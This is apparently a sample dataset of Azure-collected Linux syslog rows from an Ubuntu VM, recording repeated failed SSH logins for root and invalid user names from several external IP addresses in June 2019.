+14754,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:19,UbuntuDevEnv,2019-06-26 05:07:19,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 19644 ssh2 [preauth],5631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,19644,,
+14755,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:19,UbuntuDevEnv,2019-06-26 05:07:19,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,5631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14756,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:19,UbuntuDevEnv,2019-06-26 05:07:19,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 19644: Too many authentication failures [preauth],5631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,19644,,
+14757,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:19,UbuntuDevEnv,2019-06-26 05:07:19,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 19644 ssh2,5631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,19644,,
+14758,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:19,UbuntuDevEnv,2019-06-26 05:07:19,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14759,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:22,UbuntuDevEnv,2019-06-26 05:07:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14760,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:25,UbuntuDevEnv,2019-06-26 05:07:24,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 26752 ssh2,5707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,26752,,
+14761,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:34,UbuntuDevEnv,2019-06-26 05:07:33,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 26752 ssh2],5707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,26752,,
+14762,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:34,UbuntuDevEnv,2019-06-26 05:07:34,auth,UbuntuDevEnv,info,Invalid user catego from 5.135.161.72 port 34788,5751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,catego,5.135.161.7,34788,,
+14763,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:34,UbuntuDevEnv,2019-06-26 05:07:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14764,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:34,UbuntuDevEnv,2019-06-26 05:07:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,5751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+14765,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:37,UbuntuDevEnv,2019-06-26 05:07:36,auth,UbuntuDevEnv,info,Failed password for invalid user catego from 5.135.161.72 port 34788 ssh2,5751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,catego,5.135.161.7,34788,,
+14766,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:37,UbuntuDevEnv,2019-06-26 05:07:36,auth,UbuntuDevEnv,info,Disconnected from invalid user catego 5.135.161.72 port 34788 [preauth],5751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,catego,5.135.161.7,34788,,
+14767,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:37,UbuntuDevEnv,2019-06-26 05:07:36,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 34788:11: Bye Bye [preauth],5751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,34788,,
+14768,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:37,UbuntuDevEnv,2019-06-26 05:07:36,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 26752 ssh2,5707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,26752,,
+14769,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:39,UbuntuDevEnv,2019-06-26 05:07:39,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 26752 ssh2 [preauth],5707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,26752,,
+14770,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:39,UbuntuDevEnv,2019-06-26 05:07:39,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 26752 ssh2,5707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,26752,,
+14771,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:39,UbuntuDevEnv,2019-06-26 05:07:39,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,5707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14772,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:39,UbuntuDevEnv,2019-06-26 05:07:39,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14773,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:39,UbuntuDevEnv,2019-06-26 05:07:39,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 26752: Too many authentication failures [preauth],5707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,26752,,
+14774,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:42,UbuntuDevEnv,2019-06-26 05:07:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14775,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:45,UbuntuDevEnv,2019-06-26 05:07:44,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 33734 ssh2,5781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,33734,,
+14776,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:48,UbuntuDevEnv,2019-06-26 05:07:47,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 33734 ssh2,5781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,33734,,
+14777,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:59,UbuntuDevEnv,2019-06-26 05:07:59,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14778,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:59,UbuntuDevEnv,2019-06-26 05:07:59,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 33734 ssh2 [preauth],5781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,33734,,
+14779,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:59,UbuntuDevEnv,2019-06-26 05:07:59,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 33734 ssh2],5781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,33734,,
+14780,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:59,UbuntuDevEnv,2019-06-26 05:07:59,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,5781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14781,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:59,UbuntuDevEnv,2019-06-26 05:07:59,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 33734: Too many authentication failures [preauth],5781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,33734,,
+14782,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:02,UbuntuDevEnv,2019-06-26 05:08:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5854,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14783,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:04,UbuntuDevEnv,2019-06-26 05:08:03,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 40992 ssh2,5854,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,40992,,
+14784,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:19,UbuntuDevEnv,2019-06-26 05:08:19,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,5854,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14785,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:19,UbuntuDevEnv,2019-06-26 05:08:19,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 40992 ssh2],5854,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,40992,,
+14786,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:19,UbuntuDevEnv,2019-06-26 05:08:19,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 40992 ssh2 [preauth],5854,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,40992,,
+14787,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:19,UbuntuDevEnv,2019-06-26 05:08:19,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5854,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:19,UbuntuDevEnv,2019-06-26 05:08:19,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 40992: Too many authentication failures [preauth],5854,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,40992,,
+14789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:22,UbuntuDevEnv,2019-06-26 05:08:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:23,UbuntuDevEnv,2019-06-26 05:08:22,auth,UbuntuDevEnv,info,Invalid user deploy from 177.23.90.10 port 41838,5924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,177.23.90.1,41838,,
+14791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:23,UbuntuDevEnv,2019-06-26 05:08:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,5924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+14792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:23,UbuntuDevEnv,2019-06-26 05:08:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:24,UbuntuDevEnv,2019-06-26 05:08:23,auth,UbuntuDevEnv,info,Invalid user cafe from 196.41.208.238 port 39922,5942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cafe,196.41.208.2,39922,,
+14794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:24,UbuntuDevEnv,2019-06-26 05:08:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:24,UbuntuDevEnv,2019-06-26 05:08:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,5942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+14796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:25,UbuntuDevEnv,2019-06-26 05:08:24,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 49495 ssh2,5932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49495,,
+14797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:25,UbuntuDevEnv,2019-06-26 05:08:25,auth,UbuntuDevEnv,info,Failed password for invalid user deploy from 177.23.90.10 port 41838 ssh2,5924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,177.23.90.1,41838,,
+14798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:25,UbuntuDevEnv,2019-06-26 05:08:25,auth,UbuntuDevEnv,info,Disconnected from invalid user deploy 177.23.90.10 port 41838 [preauth],5924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,177.23.90.1,41838,,
+14799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:25,UbuntuDevEnv,2019-06-26 05:08:25,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 41838:11: Bye Bye [preauth],5924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,41838,,
+14800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:26,UbuntuDevEnv,2019-06-26 05:08:25,auth,UbuntuDevEnv,info,Failed password for invalid user cafe from 196.41.208.238 port 39922 ssh2,5942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cafe,196.41.208.2,39922,,
+14801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:26,UbuntuDevEnv,2019-06-26 05:08:25,auth,UbuntuDevEnv,info,Disconnected from invalid user cafe 196.41.208.238 port 39922 [preauth],5942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cafe,196.41.208.2,39922,,
+14802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:26,UbuntuDevEnv,2019-06-26 05:08:25,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 39922:11: Bye Bye [preauth],5942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,39922,,
+14803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:27,UbuntuDevEnv,2019-06-26 05:08:27,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 49495 ssh2,5932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49495,,
+14804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:38,UbuntuDevEnv,2019-06-26 05:08:38,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 49495: Too many authentication failures [preauth],5932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,49495,,
+14805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:38,UbuntuDevEnv,2019-06-26 05:08:38,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,5932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:38,UbuntuDevEnv,2019-06-26 05:08:38,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:38,UbuntuDevEnv,2019-06-26 05:08:38,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 49495 ssh2],5932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49495,,
+14808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:38,UbuntuDevEnv,2019-06-26 05:08:38,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 49495 ssh2 [preauth],5932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49495,,
+14809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:41,UbuntuDevEnv,2019-06-26 05:08:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:43,UbuntuDevEnv,2019-06-26 05:08:43,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56639 ssh2,5998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56639,,
+14811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:47,UbuntuDevEnv,2019-06-26 05:08:45,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56639 ssh2,5998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56639,,
+14812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:48,UbuntuDevEnv,2019-06-26 05:08:48,auth,UbuntuDevEnv,info,Invalid user service from 140.143.223.242 port 50480,6021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,service,140.143.223.2,50480,,
